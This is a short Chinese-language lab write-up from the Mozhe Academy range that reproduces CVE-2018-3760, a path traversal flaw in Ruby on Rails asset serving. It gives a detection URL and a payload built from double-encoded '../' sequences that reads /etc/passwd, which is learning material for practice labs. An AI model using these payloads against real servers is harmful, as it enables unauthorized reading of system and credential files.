墨者学院 Ruby On Rails漏洞复现第一题(CVE-2018-3760)

打开 web 页面:

发现是Ruby,在Ruby 3.7.1和更低版本中,存在由辅助解码引起的路径遍历漏洞。攻击者可以使用%252e%252e/访问根目录并读取或执行目标服务器上的任何文件。可以先检测一下是否有此漏洞:

cs 复制代码
/assets/file:%2f%2f/etc/passwd

根据报错路劲构造 payload:

/assets/file:%2f%2f/usr/src/blog/app/assets/images/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd

cs 复制代码
/assets/file:///usr/src/blog/app/assets/images/../../../../../../etc/passwd
相关推荐
codetown几秒前
openai-go通过SOCKS5代理调用外网大模型
人工智能·后端
星辞树1 分钟前
MIT 6.824 Lab 3 通关实录:从 Raft 到高可用 KV 存储
后端
q***333739 分钟前
Spring Boot项目接收前端参数的11种方式
前端·spring boot·后端
wasp52041 分钟前
做了技术管理后,我发现技术和管理其实可以兼得
java·运维·网络
赖small强1 小时前
【Linux 网络基础】HTTPS 技术文档
linux·网络·https·tls
q***42821 小时前
SpringBoot Maven快速上手
spring boot·后端·maven
Victor3561 小时前
Redis(153)Redis的网络使用如何监控?
后端
码一行1 小时前
Eino AI 实战:解析 PDF 文件 & 实现 MCP Server
后端·go
Black蜡笔小新1 小时前
视频汇聚平台EasyCVR赋能石油管道计量站精准监控与安全管理
安全·音视频
Victor3561 小时前
Redis(152) Redis的CPU使用如何监控?
后端